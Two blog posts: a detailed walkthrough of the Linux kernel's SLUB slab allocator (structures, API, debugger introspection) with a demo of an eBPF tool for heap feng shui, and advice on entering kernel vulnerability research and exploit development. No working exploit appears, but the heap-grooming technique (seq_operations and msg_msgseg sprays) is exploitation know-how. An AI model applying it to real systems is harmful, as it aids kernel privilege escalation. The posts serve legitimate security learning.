		struct {
			unsigned inuse:16;
			unsigned objects:15;
			unsigned frozen:1;
		};
	};
	unsigned int __unused;

	atomic_t __page_refcount;
#ifdef CONFIG_MEMCG
	unsigned long memcg_data;
#endif
};

/mm/slab.h

Last, but certainly not least, on our SLUB struct tour is struct slab. This structure, unsurprisingly, represents a slab. Seems pretty straightforward, right?

Well, despite it’s benign look, struct slab is hiding something. It’s actually a struct page in disguise. Wait, what?

Until recently (5.17)[6], a slab’s metadata was accessed directly via a union in the struct page which represented the slabs memory[7].

While that slab information is still stored in struct page, as an effort to decouple things from struct page, struct slab was created to move away from using struct page with the aim to move the information out of struct page entirely in the future.

Anyway, with that little bit of excitement out the way, let’s see what some of these fields within struct page, uh I mean struct slab are saying!

The first union can contain several things: slab_list, the linked list this slab belongs in, e.g. the node’s full list; a struct for CPU partial slabs where next is the next CPU partial slab and slabs is the number of slabs left in the CPU partial list.

slab_cache is a reference to the struct kmem_cache this slab belongs to.

freelist is a pointer to the first free object in this slab.

Then we have another union, this time used to view the same data in different ways. counters is used to fetch the counters within the struct easily, whereas the struct allows granular access to each of the counters: inuse, objects, frozen.

objects is a 15-bit counter defining the total number of objects in the slab, while inuse is a 16-bit counter use to track the number of objects in the slab being used (i.e. have been allocated and not freed).

frozen is a boolean flag that tells SLUB whether the slab has been frozen or not. Frozen slabs are “exempt from list management. It is not on any list except per cpu partial list. The processor that froze the slab is the one who can perform list operations on the slab”.[8]

CONFIG_MEMCG “provides control over the memory footprint of tasks in a cgroup”[9]. Part of this includes accounting kernel memory for memory cgroups (memcgs)[10]. Allocations made with the GFP flag GFP_KERNEL_ACCOUNT are accounted.

memcg_data is used when accounting is enabled to store “the object cgroups vector associated with a slab”[11].

Wrap-up

Whew, that was quite the knowledge dump! If you read through that start-to-finish then kudos to you cos that’s a lot to take in; hopefully it’s not too dry.

The aim of this section was to provide a decent foundational understanding of the SLUB allocator as seen in modern Linux kernels by exploring the core data structures used in it’s implementation and exploring how they fit together.

Next up we’ll use this to take a look at the API and how the SLUB allocator can be used by other parts of the kernel. A bit later we’ll also touch on some introspection, if you want to get some hands on and explore some of these data structures and stuff.

https://lwn.net/Articles/881039/
https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23
Remember page order sizes from the previous section? A 0x1000 byte slab is an order 0 slab (20 pages).
https://lwn.net/Articles/452884/
https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html
https://lwn.net/Articles/881039/
we’ll remember from previous posts that there is a struct page for every physical page of memory that the kernel manages
https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74
https://cateee.net/lkddb/web-lkddb/MEMCG.html
https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt
https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433

The API

Thought you were done with kernel code? Hah! Think again. Time to take our understanding of the kernel’s SLUB allocator and explore it’s API.

Like all my posts, this is pretty adhoc, so if I get excited we might take a deeper look into some of the allocator functions and have a peek at the implementation.

It’s worth highlighting again that there are three slab allocator implementations in the Linux kernel: SLAB, SLUB & SLOB. They share the same API, so as to abstract the implementation from the rest of the kernel.

As you might expect, be prepared for plenty of #ifdefs when perusing the source! The starting point for which is probably going to be [include/linux/slab.h](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h).

kmalloc & kfree

void *kmalloc(size_t size, gfp_t flags)

/include/linux/slab.h

The bread and butter of the slab allocator API, kmalloc(), as the name implies, is essentially the kernel equivalent of C’s malloc().

It allows a kernel developer to request a memory allocation of size bytes, on a success the function will return a pointer to the allocated memory and error code[1] on a failure.

static __always_inline __alloc_size(1) void *kmalloc(size_t size, gfp_t flags)
{
	if (__builtin_constant_p(size)) {
		if (size > KMALLOC_MAX_CACHE_SIZE)
			return kmalloc_large(size, flags);
	}
	return __kmalloc(size, flags);
}

We can see the generic kmalloc() definition is a wrapper around __kmalloc() which is prototyped in slab.h, but the definition is slab implementation specific.

The kmalloc() wrapper essentially hands off large allocations (defined by [KMALLOC_MAX_CACHE_SIZE](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L290)) to a separate function: [kmalloc_large()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L526) which in fact calls the underlying buddy allocator to serve large allocations!

Otherwise, [__kmalloc()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L434) is called, who’s implementation can be found in [/mm/slub.c](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L4412).

void *__kmalloc(size_t size, gfp_t flags) { 
	struct kmem_cache *s;
	void *ret;
	...
	s = kmalloc_slab(size, flags);         [0]
	...
}

Bringing things back round to the SLUB allocator, if this is making an allocation of size bytes - what kmem_cache is it allocating from? Good question!

By default the kernel creates an array of general purpose kmem_caches depending on the “kmalloc type” (derived from flags) and the allocation size.

These caches are mainly created via [create_kmalloc_caches()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab_common.c#L875) and stored in the exported symbol [kmalloc_caches](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L339):

extern struct kmem_cache *
kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HIGH + 1];

/include/linux/slab.h

So to answer our question: kmalloc() will determine which kmem_cache to allocate from by using the flags and sizes arguments to index into kmalloc_caches:

	return kmalloc_caches[kmalloc_type(flags)][index];

/mm/slab_common.c

The index is above is derived from size. The general purpose cache size-to-index can be seen via the [__kmalloc_index()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L386) definition.

This tells us the size of the objects in each kmem_cache, e.g. the kmem_cache for 256 byte objects will be at index 8.

Note that a kmalloc() allocation will use the smallest kmem_cache object size it can fit into. E.g. a 257 byte allocation won’t fit into the 256 byte objects, so it will allocate from the next cache after, which is 512 byte objects.

void kfree(const void *objp)

/include/linux/slab.h

Before you go throwing kmalloc()’s left and right, don’t forget kfree()! This is of course the ubiquitous function for freeing memory allocated via the slab allocator.

Calling this function on an object allocated via the slab allocator will free that object. If this slab was in the full list, it becomes partial and if this is the last object then the slab may get released altogether.

kmem_cache_create

struct kmem_cache *kmem_cache_create(const char *name, unsigned int size,
			unsigned int align, slab_flags_t flags,
			void (*ctor)(void *));

/include/linux/slab.h

So we’ve covered the fundamentals: allocating and freeing via the slab allocator. kmem_cache_create() allows kernel developers to create their own kmem_cache within the slab allocator - pretty neat, right?

Creating a special-purpose cache can be advantageous, especially for objects which are allocated often (like struct task_struct):

We can reduce internal fragmentation by specifying the object size to suit our needs, as the general purpose caches have fixed object sizes which may not be optimal
ctor() allows us to optimise initialisation of our objects if values are being reused
There’s also debugging, security and other benefits to this but you get the gist!

We can actually use Elixr to see all the references to kmem_cache_create() in the kernel to see who’s making use of this too!

kmem_cache_alloc

void *kmem_cache_alloc(struct kmem_cache *s, gfp_t flags) __assume_slab_alignment __malloc;

/include/linux/slab.h

Once we’ve created a kmem_cache, we can use kmem_cache_alloc() to allocate an object directly from that cache. You’ll notice here we don’t supply a size, as caches have fixed sized objects and we’re specifying directly the cache we want to allocate from!

cache aliases

Something I haven’t mentioned up until now, is the concept of SLUB aliasing.

To reduce fragmentation, the kernel may “merge” caches with similar properties (alignment, size, flags etc.). find_mergeable() implements this meragability check:

struct kmem_cache *find_mergeable(unsigned size, unsigned align,
		slab_flags_t flags, const char *name, void (*ctor)(void *));

/include/linux/slab.h

A special-purpose cache may get merged/aliased with one of the general-purpose caches we touched on earlier, so allocations via kmem_cache_alloc() for a merged cache will actually come from the respective general-purpose cache.

https://man7.org/linux/man-pages/man3/errno.3.html

Seeing It In Action

This is where things get fun! In this section we’re gonna take what we’ve learned throughout this post and double check I haven’t been making it all up :D

/proc/slabinfo

Our good ol’ friend [procfs](https://man7.org/linux/man-pages/man5/proc.5.html) is coming in strong again, by providing us [/proc/slabinfo](https://man7.org/linux/man-pages/man5/slabinfo.5.html), providing kernel slab allocator statistics to privileged users.

$ sudo cat /proc/slabinfo
slabinfo - version: 2.1
# name                 : tunables    : slabdata   
...
task_struct         1480   1539   8384    3    8 : tunables    0    0    0 : slabdata    513    513      0
...
dma-kmalloc-512        0      0    512   32    4 : tunables    0    0    0 : slabdata      0      0      0
...
kmalloc-cg-512      1169   1312    512   32    4 : tunables    0    0    0 : slabdata     41     41      0
...
kmalloc-512        40878  43360    512   32    4 : tunables    0    0    0 : slabdata   1355   1355      0
kmalloc-256        21850  21856    256   32    2 : tunables    0    0    0 : slabdata    683    683      0
kmalloc-192        35987  37002    192   21    1 : tunables    0    0    0 : slabdata   1762   1762      0
kmalloc-128         4555   5440    128   32    1 : tunables    0    0    0 : slabdata    170    170      0

snippet from $ sudo cat /proc/slabinfo

This provides some useful information on the various caches on the system. From the snippet above we can see some of the stuff we touched on in the API section!

We can see a private cache, used for struct task_struct named task_struct. Additionally we can see several general purposes caches, of various kmalloc types ( KMALLOC_DMA, KMALLOC_CGROUP and KMALLOC_NORMAL respectively) and sizes.

slabtop

[slabtop](https://man7.org/linux/man-pages/man1/slabtop.1.html) is a neat little tool, and part of the /proc filesystem utilities project, which takes the introspection a step further by providing realtime slab cache information!

 Active / Total Objects (% used)    : 3479009 / 3524760 (98.7%)
 Active / Total Slabs (% used)      : 100682 / 100682 (100.0%)
 Active / Total Caches (% used)     : 130 / 181 (71.8%)
 Active / Total Size (% used)       : 923525.41K / 936501.10K (98.6%)
 Minimum / Average / Maximum Object : 0.01K / 0.27K / 295.07K

  OBJS ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME                   
 766116 766116 100%    0.10K  19644       39     78576K buffer_head
...
 43328  40468  93%    0.50K   1354       32     21664K kmalloc-512
 36981  35834  96%    0.19K   1761       21      7044K kmalloc-192

snippet from $ sudo slabtop

slabinfo

Perhaps confusingly, there is also a tool named slabinfo which is provided with the kernel source in tools/vm/slabinfo.c (calling make in tools/vm is all you need to do build this and get stuck in).

To further the confusion, instead of /proc/slabinfo, slabinfo uses /sys/kernel/slab/[1] as it’s source of information. It contains a snapshot of the internal state of the slab allocator which can be processed by slabinfo.

Further to our section on cache aliases earlier, we can use slabinfo -a to see a list of all the current cache aliases on our system!

$ ./slabinfo -a
...
:0000256     <- key_jar

Here we can see the kmem_cache with name "key_jar" is aliased with kmalloc-256.

debugging

Sometime’s you just can’t beat getting stuck into some good ol’ kernel debugging. I’ve covered previously how to get this setup[2], it’s fairly quick to get kernel debugging via gdb up and running on a QEMU/VMWare guest I promise!

After that we can explore to our heart’s content. We can unravel the exported list slab_caches directly, or perhaps break on a call to kmalloc() and see what hits first.

gef➤  b __kmalloc
Breakpoint 2 at 0xffffffff81347240: file mm/slub.c, line 4391.
...
──────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff81347240 → __kmalloc(size=0x108, flags=0xdc0)
[#1] 0xffffffff81c4911c → kmalloc(flags=0xdc0, size=0x108)
[#2] 0xffffffff81c4911c → kzalloc(flags=0xcc0, size=0x108)
[#3] 0xffffffff81c4911c → fib6_info_alloc(gfp_flags=0xcc0, with_fib6_nh=0x1)
[#4] 0xffffffff81c44186 → ip6_route_info_create(cfg=0xffffc900007a7a58, gfp_flags=0xcc0, extack=0xffffc900007a7bb0)

Given I’m ssh’d into my guest, probably unsurprising there’s network stuff kicking about. Look like someone’s requested a 0x108 byte object, and as we’re going through kmalloc() this should end up in one of the general purpose caches.

0x108 is 264 bytes, so that’s just too big for the kmalloc-256 cache, so we should expect an allocation from on of the 512 byte general purpose caches, right? Let’s find out!

void *__kmalloc(size_t size, gfp_t flags)
{
	struct kmem_cache *s;
	...
	s = kmalloc_slab(size, flags);

Looking at the source, we can see the call to kmalloc_slab() will return our cache.

gef➤  disas 
Dump of assembler code for function __kmalloc:
=> 0xffffffff81347240 <+0>:     nop    DWORD PTR [rax+rax*1+0x0]
   0xffffffff81347245 <+5>:     push   rbp
   0xffffffff81347246 <+6>:     mov    rbp,rsp
   0xffffffff81347249 <+9>:     push   r15
   0xffffffff8134724b <+11>:    push   r14
   0xffffffff8134724d <+13>:    mov    r14d,esi
   0xffffffff81347250 <+16>:    push   r13
   0xffffffff81347252 <+18>:    push   r12
   0xffffffff81347254 <+20>:    push   rbx
   0xffffffff81347255 <+21>:    sub    rsp,0x18
   0xffffffff81347259 <+25>:    mov    QWORD PTR [rbp-0x40],rdi
   0xffffffff8134725d <+29>:    mov    rax,QWORD PTR gs:0x28
   0xffffffff81347266 <+38>:    mov    QWORD PTR [rbp-0x30],rax
   0xffffffff8134726a <+42>:    xor    eax,eax
   0xffffffff8134726c <+44>:    cmp    rdi,0x2000
   0xffffffff81347273 <+51>:    ja     0xffffffff813474d8 <__kmalloc+664>
   0xffffffff81347279 <+57>:    mov    rdi,QWORD PTR [rbp-0x40]
   0xffffffff8134727d <+61>:    call   0xffffffff812dbe70 
   0xffffffff81347282 <+66>:    mov    r12,rax
   ...

Okay, nice, we can see the call to kmalloc_slab() on line 20, so we just need to check the return value after that call :) Cos we’re on x86_64 we know it’ll be in $RAX.

───────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0xffff888100041a00  →  0x0000000000035140  →  0x0000000000035140
...
─────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0xffffffff81347273 <__kmalloc+51>   ja     0xffffffff813474d8 <__kmalloc+664>
   0xffffffff81347279 <__kmalloc+57>   mov    rdi, QWORD PTR [rbp-0x40]
   0xffffffff8134727d <__kmalloc+61>   call   0xffffffff812dbe70 
 → 0xffffffff81347282 <__kmalloc+66>   mov    r12, rax
...
───────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff81347282 → __kmalloc(size=0x108, flags=0xdc0)
────────────────────────────────────────────────────────────────────────────────────────────
gef➤  p *(struct kmem_cache*)$rax
$6 = {
  ...
  size = 0x200,
  object_size = 0x200,
  ...
  ctor = 0x0 ,
  inuse = 0x200,
  ...
  name = 0xffffffff8297cb4c "kmalloc-512",

And voila! We cast the value returned by kmalloc_slab() as a kmem_cache and just like that we can view the members. We can see the name is indeed kmalloc-512 as we hypothesised and we can also see some of the other fields we touched on :)

Anyway, hopefully that was a fun little demo on how you can reinforce your understanding with a little exploration in the debugger.

I also wanted to highlight [drgn](https://github.com/osandov/drgn) as another debugger to tinker with, which lets you do live introspection & debugging on your kernel. It’s written in python and is very programmable, however I couldn’t get it to find some symbols for this particular demo.

slxbtrace (ebpf)

Now for the grand reveal, the real reason behind this 5,000 word (yikes) post … a cool little tool I’ve been working on for visualising slub allocations :D

Well, this could very well already be a thing, but I’d been sleeping on ebpf for far too long and this seemed like a fun way to explore the tooling.

Without going too much into the ebpf implementation (another post, maybe?!), slxbtrace[3] lets you specify a specific cache size and visualise the cache state. In particular you can highlight allocations from particular call sites, making it a neat tool for helping with heap feng shui during exploit development.

pls excuse the flickering… my fault for using linux

Let me explain what on earth is going on here. So, slxbtrace will basically hook and process calls to kmalloc() and kfree() and show you what’s where in a cache.

So far it’s pretty naive, when you run it, it has no knowledge of the cache state. However, once it starts catching kmalloc()’s it can build up an idea of where the slabs are (as they’re page aligned) and the objects in it.

Each known slab is visualised. We can see the slab address on the left, and then the objects in the slab as they’d sit in memory:

? means slxbtrace doesn’t know the state of this object
- represents a free object
x represents a misc allocations
0... we can then tag specific allocations so they’re easy to visualise

So what’s going on in this demo?! Well I am tracking the state of the kmalloc-cg-32 cache with slxbtrace on the left, while I run a program will triggers a bunch of kmallocations on the right (kmalloc32-fengshui). This program:

Triggers 800 allocations of struct seq_operations, whose allocations are tracked as |0|, to fill up some slabs!
Free’s every other struct seq_operations after the first 400, effectively trying to make some holes (denoted by |-|) in the slabs we just filled up
Next I allocate a bunch of struct msg_msgsegs of the same size (denoted by |1|), trying to land them next to my struct seq_operations in memeory :D
Finally I cleanup everything and free it all :)

Right now this is just a very, very barebones poc and likely has some issues, but I thought it would be neat to share here as it demonstrates some of the stuff we’ve touched on.

I will absolutely share all this on my github though, once it’s in a shareable state, just in case anyone else is also interesting in playing around!

https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab
https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/#debugging
not the final name, probably

Wrapping Up

Is this… did we… is it over? This one really turned into an absolute leviathan, but perhaps that’s just a testament to work that behind the kernel’s slab allocator!

In this post we covered an integral part to the kernels memory management subsystem: the slab allocator. Specifically, we looked at the SLUB implementation which is the de factor implementation on modern systems (bar embedded stuff).

We really lived up to the Linux internals namesake in this post, as we dived in and explored the SLUB allocator from all angles: the underpinning data structures, the API used by the rest of the kernel and then validated this all with some introspection.

Hopefully this provided a reasonably holistic insight into slab allocators, with opportunities for further reading/exploration readily available.

Also worth noting we kept things pretty shiny as we looked primarily at the latest (at the time of starting) kernel release, v6.0.6!

I was going to expand a bit on SLAB and SLOB, but to be honest we’re almost at 6000 words and it’s probably out of scope for my aims for this series, but just in case:

SLAB (non-default since 14 years) was the prev default implementation and the tl;dr is it was more complex than SLUB and less friendly to modern multi-core systems [1]
SLOB was introduced ~2005 and aimed at embedded devices, trying to think things compact as possible to make the most of less memory [2]

Next Time!

Well, to be honest, as far as “Memory Allocators” goes as a topic, we’ve done pretty well between our coverage on the buddy and slab allocators.

I’m not entirely sure there will be a next time for this mini series, I might hop back onto the virtual memory stuff and look into the lower level implementation there.

That said, if I were to explore the memory allocator space more I’d want to cover the security side of things: memory allocators in the context of exploit techniques and mitigations. If that’s something you’d be into, feel free to let me know :)

Otherwise: thanks for reading, and as always feel free to @me if you have any questions, suggestions or corrections :)

exit(0);

So You Wanna Pwn The Kernel?

sam4k — Thu, 01 Sep 2022 14:07:40 +0000

Initially I was going to write the next instalment of the Linternals: Virtual Memory series after getting back from HITB2022SIN, but after a number of offline and online conversations it seems like this could help a number of you out, so let’s give it a go!

My aim for this post is to provide some insights into getting into Linux kernel vulnerability research and exploit development (VRED), although I’m sure some of this will be transferable to similar areas.[1]

Sounds fairly straightforward, right? Well, much like the process of writing a kernel exploit, diving into this can also open-ended and confusing. There are many approaches and a wealth of resources out there, with no clearly defined path to follow.

Is this post going to pave that clearly defined path? Probably not. We all learn in different ways, have different experiences, motivations and goals. Hopefully, however, I can help demystify this topic a bit for you and give you the tools necessary to pave the right path for you.

Overview
Mindset
- Motivation
- Curiosity
- Perseverance
- Ego
Approaches
- Reading
- Videos
- Projects
Workflow
Resources
Wrapping Up

For a more general post on demystifying security research, I absolutely recommend a post of the same title by Alex Plaskett here, which touches on similar themes

Overview

As I mentioned above, linux vred is a complex and constantly evolving topic. So as you might imagine, trying to write an accessible, usable introduction to this topic has it’s own challenges. But we gotta try!

The first thing I want to cover is mindset. Yeah, I get it, sounds wishy-washy and inactionable, but I think it will help to talk a bit about some useful mindset tips for approaching work like this and avoiding burnout.

Then I’ll move onto talking about approaches you can take to begin your journey down the rabbit hole that is linux vred and hone your skills. Again, worth highlighting here that these are just suggestions from my experiences and are non-exhaustive.

I’ll briefly touch on my workflow and some of the tooling I find useful, again this is really personal preference, but may be helpful as a starting point. Plus I always find it interesting to hear what cool tools and workflows other people use!

Finally I’ll wrap things up with a list of resources, this will be far from exhaustive as well, but hopefully I’ll get a decent amount of stuff in there!

Mindset

Motivation

At risk of sounding like one of those YouTube motivational speakers, one of the first things you want to understand is your motivation for getting into this.

💡

Do you love understanding things and then breaking them? Do you use Linux daily and finally want to get back at it? Do you want to pivot from exploiting a different platform? Did you watch the movie Blackhat (2015)? Do you want a new hobby to keep you up till 4am?

Whatever your motivation, it’s important to go into this with the understanding that this is a long journey, you (probably) won’t be pwning kernels overnight! In fact, you’ll never understand everything. There will be many “failures” and hurdles along the way.

But that’s okay! Actually, it’s more than okay, that means you’re (probably) doing it right! Though, I’d be lying if I said this cycle of learning and “failure” with the occasional success wasn’t a magnet for burnout and motivational humps.

However, by understanding your motivations and goals, as well as what you’re getting into, these motivational humps can be more manageable and infrequent.

In terms of managing these humps, try where possible to prioritise working on things you enjoy and are interested in. Not only will it be better for your mental health, but you’ll also likely find yourself more productive.

Due to the open-ended and exploratory nature of vred, you’re not gonna have a good time trying to innovate and seek out solutions if you’re completely unmotivated to do so. For the same reason, having some structure and milestones associated with tasks also helps prevent feelings of aimless drifting or getting overwhelmed.

Like I said though, these humps aren’t always avoidable and are managed differently by different people, so I won’t pretend to know the answers. For example, a common recommendation, and one I use, is to remember to context switch!

If you’ve been bashing your head against the keyboard for some months, neck-deep in C source code trying to find a particular primitive, sometimes it can help to take a pause. Go write that Python tool you’ve been meaning to. No, you won’t forget everything. In fact, you may come back with a fresh perspective and clear mind.

Curiosity

Curiosity may have killed the cat, but it’s a security researcher’s best friend. Especially starting out, it can be tempting to rush to popping that shell.

Trust me, I’ve been guilty of it many a time. You’re just starting out and trying a kernel CTF and you just want to get that flag to prove you can do it, right? So you Google some techniques and you copy and paste some code, tweak some stuff and keep iterating until you get it.

But as Emerson said, “It’s not the destination, it’s the journey”. More important than popping the shell, is understanding how you popped it. The former may be a win here, but it’s that deeper understanding which will net you future wins.

Be curious! Ask questions! Take your time. If you don’t quite understand this technique you’ve seen, spend some time playing around with it until you do. If something isn’t working, spend some time getting to the root cause rather than jumping straight to another approach.

This fundamental understanding you’ll develop by being curious is a lot more flexible and applicable to future projects than a surface level awareness of potential techniques or approaches.

Perseverance

I’ve touched on this a few times now: kernel VRED is both complex and open-ended. Not only is there no clear path to winning, sometime’s there is no path at all.

There might not be a bug in that module you’ve been looking at or a way to elevate your privileges with that heap overflow. Again, that’s okay, it’s normal!

Being able to persevere in the face of regular hurdles and dead-ends is key. An important aspect of this is defining “success” and “failure”. I’ve thrown the F word around a few times so far, and been mindful to put it in quotes.

Just because you’ve spent months searching for a bug in a kernel module and come up with nothing, doesn’t mean you’ve failed. During that time you’ve likely deepened your understanding of the kernel, improved your workflow, come up with tooling etc.

All of these are things which can help you “win” going forward, so yes while perseverance is key when you hit these roadblocks and dead-ends, also try not to just see them as failures!

It’s also worth noting, the flip side of this is knowing when to call it quits. Later in in the workflow section, I talk about having a gameplan for approaching vred tasks. Such that when you’ve exhausted your gameplan, you know it’s time to move on.

Ego

“your idea or opinion of yourself, especially your feeling of your own importance and ability” - Cambridge Dictionary on “ego”

Ego plays a big role in our industry, and fortunately is something that is spoken about more these days. And no I’m not talking about inflated egos (yet), but imposter syndrome.

In the beginning, you may come into this field finding things extremely daunting and overwhelming. After all, the kernel is huge and complicated and there’s so many super smart people out there publishing some amazing work!

For many of us, this feeling never goes away. Myself included! I recently did my first conference talk at HITB2022SIN, and I was anxious for weeks in the build up despite the topic being something I worked on for months and was super familiar with.

Part of this was to do with public speaking, but part was worrying about the quality and validity of my work in the eyes of peers. What if it was all horribly wrong?!

So this section is just to reassure that if you feel this, it’s okay, you’re not alone! While this is common, try not to let it get on top of you! My main advice here would be that the only person you should be comparing yourself with is yourself a year or so ago[1] :)

The flip side to this, of course, is that I think it’s good to maintain a level of humility. This is a field that is constantly evolving and you’ll never know it all. Furthermore, due to the complexity of some this stuff, you might not have a complete understanding. This is all okay, just be open, and happy even, to adjust that understanding.

Totally arbitrary number of course, as you may have taken a break and been working in other areas, but you get the gist of what I mean

Approaches

Alright, let’s move onto some hands on advice! Hopefully now I’ve instilled some of mindset involved in getting into kernel vred stuff, time to put it to good use!

As has been a running theme here, there’s many different approaches to get stuck into this and we all approach learning in different ways. I’ve tried to provide a variety of options here, though this is far from an exhaustive list.

Feel free to experiment, mix-and-match and see what works best for you! To throw in my 10 cents: I have found hands-on projects by far the best method to develop a working understanding of new stuff, supplementing this with some reading.

Reading

Okay, so the bread-and-butter for learning about kernel vred stuff is going to be reading; there’s a wealth of blog posts and publications out there on a range of topics.

Not sure what else to say about this, other than that the hardest part here is curating and finding these readings. Contributors can vary from hobbyists, professional research and academic research - all being hosted in different places by different people.

Beyond the customary “use Twitter” for your infosec needs, I’ve also included a link in the resources below to a great repo called Linux Kernel Exploitation maintained by @andreyknvl which contains a pretty thorough list of reading materials.

Coming into this, the amount of materials out there may be overwhelming. I’d just suggest starting with stuff immediately relevant to what you’re working on/interested in. E.g. if you want to try write a local priv esc, then read some recent LPE write-ups.

Also remember curiosity and perseverance. Some/most/all of this stuff may be utter gibberish at first, and that’s fine. Especially with VRED write-ups, each bug and exploit will have it’s own specific nuances which will be foreign to even experienced folks reading them for the first time.

Just remember to take your time to pause and follow up each bit you don’t understand, even if it leads you down another rabbit hole, until you can piece it together.

Also another disclaimer that not everyone who takes the time to share their work is a NYT best seller, graphics designer or native English speaker!

Videos

If you’re more of a visual learner, the options are a bit more limited but not non-existent. Besides my GIFs and occasional diagrams, there is a reasonable amount of recorded conference talks available on YouTube.

Again, the problem here becomes trying to find which conferences to checkout for content, because some of these may not index well and may not have a tonne of views. In the Resources section below, I’ll include a list of con channels to get you started.

I’m sure there’s probably some great content creators out there pumping out videos, but as that’s not my preferred media I’m afraid I can’t help much there. If you know of any I can plug here who make vids on Linternals / VRED then @ me pls.

Projects

I feel like theory can only get you so far and if you’re interested in doing some kernel vred, you’re going to need to get your hands dirty at some point anyway!

By getting some hands on, you’re able to put into practice the techniques and understanding you’ve gained from your research. Furthermore, sometimes the best way to understand something in the kernel is to get in the debugger and take a peak yourself.

However, it’s one thing to be told “just get some hands on experience!” and another to actually know where to start, especially if you’re completely new to this.

As a result, I’ll include some ideas and starting points for potential projects here. You’ll find the more you get into things, the more ideas you’ll have for your own tooling or experiments as you go on:

A core part of kernel vred is, of course, understanding the kernel, so one project idea could be try and write your own kernel driver and play around with some features (reading input for userspace via IOCTLs, allocating memory etc.)
Follow along with exploit write-ups! Find a local privilege escalation write-up you like (maybe with source available) and try follow it along and get it running in a VM; again taking the time to understand the how’s and why’s of what’s going on
Taking this a step further, you could try the above without source or even without a write-up by looking at some CVE’s. Alternatively, piggy-backing off of idea 1 you could write your own vulnerable driver and exploit that :)
CTFs are of course another popular way to test your kernel vred mettle, and I’ll provide some links in the resources to some below.
Tooling! Writing tooling to improve your kernel vred workflow or even just to explore kernel internals can be great way to develop that fundamental understanding. Don’t worry if you don’t have ideas right now, trust me you will!
Posting your own write-ups or analysis! When I started this blog, I actually never intended for anyone to see it, it was just a way to motivate myself to look into various topics and refine my understanding on them via writing accessible posts

Workflow

Now onto the less glamorous, but just as fundamental part: workflow. I appreciate this is highly preference based, so this is more for reference and because I also find it interesting to hear about other people’s workflows.

Your workflow is something that will likely constantly evolve, refined over an iterative process of discovering new tools and deeper understanding of your own preferences, strengths and weaknesses. Don’t be afraid to try new things! :)

Tooling

For my IDE, I use “a configuration framework for GNU Emacs” called Doom. It’s very easy to setup (and tweak) and the default settings are pretty good. I actually found this project thanks to a great talk, “Kernel Hacking Like It’s 2020” by Russell Currey.

If you’re interested in finding out more about Doom Emacs, there’s a cool playlist on YouTube to get you started by Zaiste Programming.

Another cornerstone of my workflow is virtualisation. Whenever I’m writing up a new exploit or doing some testing, I’ll be spinning up a representative target VM[1]. My tool of choice here is QEMU; I find it to be lightweight and very flexible (and it’s free and open-source!).

The last part of the tooling trifecta for me: the debugger. Perhaps unsurprisingly I’m regularly neck-deep in gdb[2]. Despite being quite literally older than me, it still holds up. That said, addons like hugys’s GEF (GDB Enhanced Features) makes life easier.

Organisation

AKA Documentation. Yep, I said it. But no, I’m not talking about carefully curated and margin-tweaked executive reports or several hundred page long technical specifications.

I can’t stress enough how much future you will thank yourself if you get into the habit of documenting your work early on. It doesn’t have to be anything fancy, I just use markdown + git. Just make sure there’s some semblance of order and that it’s going to be easy for you to hunt down and refer back to later.

You will accumulate a lot of knowledge during your research and you won’t be able to retain all of it, nor will all of it be immediately useful. But having it neatly documented and easy to reference means that when you have to go back to it, you can. It also just helps to reinforce knowledge and understanding too.

Whether it’s coming back to a kernel module you’ve previously done work on and want a refresher, or if you found a heap shaping primitive in a previous CTF that would be a perfect fit for the one you’re working on now - having notes to refer back to is a life saver.

Staying Up-To-Date

Another useful part of your workflow to consider is keeping up-to-date with the latest kernel gossip. It seems like every week there’s a new write-up or poc dropping and it can be a lot to keep up with, especially when they’re from all over the place.

When I first asked a colleague how they found all these papers and write-ups, they replied Twitter and I scoffed. Surely not? But lo and behold, several years later I can confirm Twitter is still probably the best means to find this kind of content. It is what it is.

Alternatively of course, you can try to curate your own feed (e.g. via RSS or Atom) from the sources themselves and use a reader to catch updates.

Another sources beyond blogs and news sites is of course mailing lists. Yep, they’re still a thing. The one I mainly keep an eye on is oss-security which is where you’ll find public disclosures for linux kernel stuff if they went through the CVD process.

Furthermore, if you want to get granular and you’re looking for specific information don’t be afraid to dive into commit history or the lkml.

Having a Gameplan

We’re almost there, I promise! The last, but certainly not the least, aspect of the workflow I want to talk about is having a gameplan for approaching vred projects.

Whether it’s vulnerability research or exploit development, we’re dealing with inherently complex and open-ended problems, which may have no solution at all.

By approaching these problems with a structured methodology, we’re able to breakdown what can seem a daunting and overwhelming task into manageable chunks. Also, if we get to the end of it and don’t find that bug or pop that shell, we at least know we’ve tried our best and can take what we’ve learned and move onto the next task.

So instead of just diving into the problem and following each lead, I’d recommended figuring out a gameplan that works for you and trying to approach these problems in and ordered, methodical way.

Again, this is something that will vary from person to person, depending on how you work. It will also likely evolve over time as you do more of this kind of work, and that’s okay :)

For more concrete examples, I talk about this in my talk “E’rybody Gettin’ TIPC: Demystifying Remote Linux Kernel Exploitation”. The recording isn’t up yet, but you can see the slides here.

Resources

I’m already 3000 words deep so this resources section will be a work in process and is far from exhaustive. If you have additions, feel free to @ me or DM me and I’ll get them in.

CTFs

HTB has some kernel pwn challenges to practice your skills with
smallkirby/kernelpwn seems like a decent curation of some kernel pwn challenges, with a section for beginners too :)

Reading Materials

No need to reinvent the wheel, absolutely check out the awesome repo Linux Kernel Exploitation, maintained by @andreyknvl, containing a wealth of papers and write-ups
